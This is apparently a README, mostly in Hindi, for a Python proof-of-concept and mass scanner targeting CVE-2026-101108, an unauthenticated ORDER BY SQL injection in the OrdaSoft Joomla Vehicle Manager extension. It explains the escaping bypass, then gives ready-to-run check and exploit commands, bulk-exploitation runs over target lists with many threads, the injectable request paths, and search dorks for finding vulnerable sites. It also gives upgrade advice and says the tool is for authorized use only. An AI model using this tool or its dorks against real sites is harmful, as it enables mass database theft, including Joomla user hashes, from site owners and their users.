
Python 3 PoC और CVE-2026-101108 के लिए मास स्कैनर, जो OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager) में एक अनधिकृत ORDER BY SQL इंजेक्शन है।
CVE-2026-101108 के लिए Python 3 PoC — OrdaSoft Vehicle Manager (Free) Joomla एक्सटेंशन ≤ 6.5.7। 6.5.8+ में ठीक किया गया।
| PoCbit | https://pocbit.org/pocs/cve-2026-101108 |
| Catalog | https://pocbit.org/pocs/ |
| Component | com_vehiclemanager |
| File | site/vehiclemanager.php |
| Parameters | order_field, order_direction → ORDER BY (unquoted) |
| Auth | कोई नहीं (सार्वजनिक श्रेणी / खोज / सभी-वाहन दृश्य) |
| CWE | CWE-89 SQL Injection |
| CVSS 4.0 | 9.3 Critical (Joomla CNA) |
Vehicle Manager (Free), Joomla में वाहन लिस्टिंग (श्रेणी, खोज, सभी वाहन) प्रदान करने वाला OrdaSoft एक्सटेंशन है। 6.5.7 और पूर्व संस्करणों में, order_field और order_direction सॉर्टिंग पैरामीटर site/vehiclemanager.php में संसाधित होते हैं: इनपुट पर एस्केपिंग लागू होती है, लेकिन मान बिना उद्धरण के ORDER BY कथन में रखा जाता है, इसलिए एस्केपिंग SQLi के विरुद्ध अप्रभावी रहती है (CNA विवरण)।
हमलावर बिना प्रमाणीकरण के डेटाबेस पढ़/लिख सकता है, जो Joomla उपयोगकर्ता हैश और साइट अखंडता के लिए गंभीर जोखिम पैदा करता है। 6.5.8 या नए संस्करण में अपग्रेड करें।
सामान्य Joomla/PHP कोड उपयोगकर्ता इनपुट को एक "सैनिटाइज़र" से गुज़ार सकता है जो स्ट्रिंग लिटरल के लिए उद्धरणों को एस्केप करता है। ORDER BY में, कॉलम नाम और एक्सप्रेशन स्ट्रिंग लिटरल नहीं होते — सॉर्ट कुंजी SQL संरचना के रूप में जोड़ी जाती है। हमलावर वास्तविक कॉलम नाम के बजाय error-based सबक्वेरी जैसे एक्सप्रेशन प्रदान करता है। CVE-2026-101108 का CNA पाठ स्पष्ट रूप से इस एस्केप बायपास पैटर्न का दस्तावेज़ीकरण करता है।
प्रभावित अनाम फ्रंटएंड प्रवेश बिंदु:
showCategory)search / संबंधित कार्य)showVehicles और समान)| Mode | Behavior |
|---|---|
| check | कंपोनेंट + मैनिफ़ेस्ट संस्करण फिंगरप्रिंट करें, catid/Itemid खोजें, SQLi की पुष्टि करें |
| exploit | ORDER BY के माध्यम से error-based EXTRACTVALUE-style डबल क्वेरी |
| mass | बल्क चेक या बल्क एक्सट्रैक्ट के लिए --list + -j |
प्रयास किए गए इंजेक्शन वेक्टर (exploit में पहला सफल जीतता है):
order_field GETorder_direction GET (asc,<subquery>)order_field POSTorder_direction POSTJSONL फ़ील्ड: pocbit, pocbit_catalog, pocbit_page, cve, component.
cd CVE-2026-101108
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| Flag | Meaning |
|---|---|
--aggressive | Check मोड SELECT VERSION() लीक का भी प्रयास करता है |
--subquery | error-based पेलोड के लिए आंतरिक SELECT (MySQL) |
--vector | चार ORDER BY वेक्टर में से एक को बाध्य करें |
--exploited-list | सफल exploit पर टैब-पृथक लीक |
--no-color | सादा CLI (NO_COLOR का सम्मान) |
एग्ज़िट कोड: exploit मोड 0 जब exploited: true; check मोड 0 जब exploitable_candidate।
श्रेणी रूट (PoC द्वारा सॉर्ट पैरामीटर जोड़े गए):
GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc HTTP/1.1
PoC द्वारा बनाया गया खोज रूट बेसलाइन:
GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all HTTP/1.1
जब पठनीय हो:
/administrator/components/com_vehiclemanager/vehiclemanager.xmlसंस्करण ≤ 6.5.7 → likely_vulnerable_version। ≥ 6.5.8 → patched_version।
body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"
होस्ट को targets.txt में निर्यात करें (प्रति पंक्ति एक बेस URL), फिर केवल अधिकृत संपत्तियों पर check → hits → exploit करें।
Real Estate Manager CVE के समान प्रकटीकरण विंडो (जैसे CVE-2026-100752 / CVE-2026-100753): कई OrdaSoft Joomla एक्सटेंशन को SQLi/XSS फिक्स प्राप्त हुए। यदि आप Vehicle Manager चलाते हैं, तो अपने द्वारा तैनात सभी OrdaSoft कंपोनेंट को पैच करें।
| CVE | Product | Issue | Fixed |
|---|---|---|---|
| CVE-2026-101108 | Vehicle Manager (Free) | Unauth ORDER BY SQLi | 6.5.8 |
| CVE-2026-100752 | Real Estate Manager | Unauth ORDER BY SQLi | 6.7.9 |
श्रेय (CNA): Ala Arfaoui।
com_vehiclemanager SQLi (पुराने संस्करण, खोज पैरामीटर) — भिन्न लेकिन संबंधित कंपोनेंट सतहकेवल अधिकृत सुरक्षा परीक्षण और पैच सत्यापन।
CVE-2026-101108 PoC: OrdaSoft Joomla Vehicle Manager (Free) <=6.5.7 unauth SQLi — order_field/order_direction unquoted ORDER BY (com_vehiclemanager). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101108